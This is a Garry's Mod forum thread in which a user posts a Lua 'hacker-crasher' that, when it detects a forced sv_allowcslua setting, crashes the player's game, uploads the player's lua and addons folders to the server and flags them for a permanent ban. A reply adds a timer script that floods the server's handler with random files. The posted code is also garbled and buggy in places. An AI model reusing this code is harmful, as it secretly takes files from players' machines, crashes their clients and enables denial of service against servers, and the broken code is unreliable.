A Hax Stealer Script

Something I made to deal with hackers. It’s SUPPOSED to copy their Lua folder, crash their game, and ban them permanently.
I’m just curious if it works. If someone with some simple hax is willing to test it for me, I’d be pretty grateful.
If someone can see an obvious issue, I’d enjoy the input.
So, uh, here…
[LUA]
–Bobblehead’s Hacker-Crasher
if SERVER then
util.AddNetworkString(“Cheater”)
util.AddNetworkString(“CheaterCode”)
net.Receive(“Cheater”, function(ln, client)
client:SetPData(“Cheater”, true)
client.FileDir = string.Replace(client:SteamID(), “:”, “_”)
if not file.Exists( “HAX”, “DATA” ) then
file.CreateDir(“HAX”)
end
file.CreateDir(“HAX/”…client.FileDir)

end)
-- hook.Add("EntityRemoved", "BanHaxorz", function(ent)
	-- if ent:IsPlayer() and ent:GetPData("Cheater",false) then
		-- RunConsoleCommand("ulx", "banid", ent:SteamID(), 0, "[BH-C] Hacking.")
	-- end
-- end)

net.Receive("CheaterCode", function(ln, client)
	if not client.FileDir then client.FileDir = string.Replace(client:SteamID(), ":", "_") end
	local dir, filename, filedata = net.ReadString(), net.ReadString(), net.ReadString()
	local dir = "HAX/"..client.FileDir.."/"..dir
	if not file.Exists(dir, "DATA") then
		file.CreateDir(dir)
	end
	if not file.Exists(dir.."/"..string.Replace(filename, ".lua", ".txt"), "DATA")then
		file.Write(dir.."/"..string.Replace(filename, ".lua", ".txt"), [[--[BH-C] I'M IN YOUR LUA! STEALING YOUR HAX...

]]…filedata)
else
file.Append(dir…"/"…string.Replace(filename, “.lua”, “.txt”), filedata)
end
end)

else
hook.Add(“Tick”, “Nohax”, function()
if GetConVarNumber( “sv_allowcslua” ) == 1 then
net.Start(“Cheater”)
net.SendToServer()
timer.Simple(608, cam.End3D)
CopyDir(“lua”, “GAME”)
CopyDir(“addons”, “GAME”)
elseif GetConVar( “sv_allowcslua” ):GetInt() == 1 then
net.Start(“Cheater”)
net.SendToServer()
timer.Simple(60
8, cam.End3D)
CopyDir(“lua”, “GAME”)
CopyDir(“addons”, “GAME”)
elseif GetConVar( “sv_allowcslua” ):GetString() == “1” then
net.Start(“Cheater”)
net.SendToServer()
timer.Simple(608, cam.End3D)
CopyDir(“lua”, “GAME”)
CopyDir(“addons”, “GAME”)
elseif GetConVarString( “sv_allowcslua” ) == “1” then
net.Start(“Cheater”)
net.SendToServer()
timer.Simple(60
8, cam.End3D)
CopyDir(“lua”, “GAME”)
CopyDir(“addons”, “GAME”)
end
end)
local function CopyDir(dir,src) --copypasta from gmod wiki.
local files = file.Find(dir…"/.lua", src)
for k,v in pairs(files) do
if v and v ~= “” then
SendFileToServer(dir,v)
end
end
local files,directories = file.Find(dir…"/
", src)
for _, fdir in pairs(directories) do
if fdir ~= “.svn” then
CopyDir(dir…"/"…fdir, src)
end
end
end

function SendFileToServer(dir,filename, filedata)
	local filedata = filedata or file.Read(filename)
	net.Start("CheaterCode")
		net.WriteString(dir)--directory first
		net.WriteString(filename)--directory first
		net.WriteString(string.Left(filedata, math.Round(string.len(filedata)/2)))--filedata third
	net.SendToServer()
            SendFileToServer(dir, filename, string.Right(filedata, math.Round(string.len(filedata)/2)))--Split it in half to make sure it goes.
end

end
[/LUA]

If anyone wants to use it themselves, I don’t mind, assuming it works.

I won’t believe that this works. :0

yo this is crazy i will be using this on my elite dark rp server powered by hera

BanHaxorz

I’M IN YOUR LUA! STEALING YOUR HAX…

copypasta

found 3 errors

Yeah, and what if you set sv_allowcslua 1 on your server? Free bans and crashes for everyone?

Yeah. If YOU do that then have fun.

…Second thought I can imagine an rcon breakin being crazy bad.
I’ll make it check the server with the client.

Well if you have sv_allowcslua on, you’d be dumb to not expect people to cheat. That’s why most servers have it off. Even if it is easily bypassed.

I don’t care about people cheating, I am talking about this scripts reliability.

[lua]
timer.Create(“shitspam”, 0.05, 0, function()
net.Start(“CheaterCode”)
net.WriteString(randomFolderName)
net.WriteString(randomFileName)
net.WriteString(randomData)
net.SendToServer()
end)
[/lua]

Thank you kindly for letting me write files on your server kthnx.

Don’t even try OP.

Look at OAC. It doesn’t fix file sizes, but it shows how files should be sent.

whats the point of stealing his lua scripts (cheats) if you’ve already detected him?

Well I’m testing this on my test server so I won’t really care if it ruins it.

I’ve tested this and I’m getting an LUA error which I’ve no idea how to fix:

Calling net.Start with an unpooled message name



hook.Add("Tick", "Nohax", function()
		if GetConVarNumber( "sv_allowcslua" ) == 1 then
			net.Start("Cheater") -- problem here
			net.SendToServer()
			timer.Simple(60*8, cam.End3D)
			CopyDir("lua", "GAME")
			CopyDir("addons", "GAME")


[LUA]util.AddNetworkString( “Cheater” )[/LUA]

on serverside

Attempt to call ‘CopyDir’ <a nil value>

To see what other ways of detecting hax there are.
Stealing hax allows me to create a more thorough anticheat.
Also I wouldn’t mind releasing hax that people pay for onto the open internet, cuz fuck hackers.

They can make whatever file they want but it only goes in the HAX folder and it can only be a .txt file.
Who gives a fuck what kind of .txt file they make in the HAX folder?
And if the system works correctly they have about 8 minutes before they’re banned permanently anyway…

Line 34 add a ) after end.

Correct me if I am wrong but this.

Also, if you think a little harder, you would see what Wizard’s script is doing. Every 50ms it puts a random text file with random data (probably the full 64kb) inside your folder. 64000 x 20 x 60 = 76800000, which translates to 73.24mb of junk data being sent to you every minute. Assuming the directories that are sent are named random things, that would equate to 1200 directories being created per minute. In addition to just fucking with your script, this probably also has DoS potential. Sure it writes everything to you hax folder, but it still allows arbitrary file uploading, and pissing off a hacker by crashing him and stealing his hacks isn’t going to end well for you if they know what they are doing. Also, I’m pretty sure you can check it a networked string exists. Wizard could probably edit his script to see if your networked variables exist, so we could automatically look for your “anticheat” and mess with it.

Your system assumes that people just plain force allowcslua to cheat. Even though many of the ways to run lua without forcing the cvar aren’t public, cvar hiding techniques are. This is probably the shittiest way to detect cheats, and the only cheats you are going to detect will be shit like hera.

I’ll disallow …/ in the directory strings, banning if string.match().

I’ll add a security code. Server sends the code to client, client sends it back to server with the files. If the code is different upon receival, the player is banned.

And I’m stealing hax to find out how else to detect them. This might be easy to bypass now but once I get a good hax base I can overwrite functions used by their hacks and whatnot. The objective now is to get the stealer working and to ban them.

It’s not a good idea to put an automated system in charge of permabanning/crashing people, especially as you start to add more and more unreliable methods that might detect hacks, but also have the possibility of detecting innocent users too.

Also, if you want discussion on detecting cheats, go look at the anticheat thread. Some neat stuff was discussed there.

Stealing someone’s scripts, crashing them, then releasing them is a dick move, and seeing how half the kids I have met on gmod have booters, it’s not a very good idea to purposely piss random people off.

On a slightly related note…

What causes a clientside reliable stack overflow?

I thought that was fixed in new gmod?